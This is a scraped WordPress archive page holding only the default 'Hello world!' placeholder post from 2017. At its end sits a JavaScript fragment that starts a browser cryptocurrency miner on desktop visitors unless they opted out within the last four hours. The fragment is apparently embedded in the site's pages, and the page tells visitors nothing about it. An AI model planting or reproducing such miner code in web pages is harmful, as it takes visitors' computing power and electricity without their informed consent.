Category Archives: Uncategorized

Hello world!

by Chief Creative & Founder

Posted on May 21, 2017 at 08:57 AM

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

Continue Reading


// Only start on non-mobile devices and if not opted-out // in the last 14400 seconds (4 hours): if (!miner.isMobile() && !miner.didOptOut(14400)) { miner.start(); }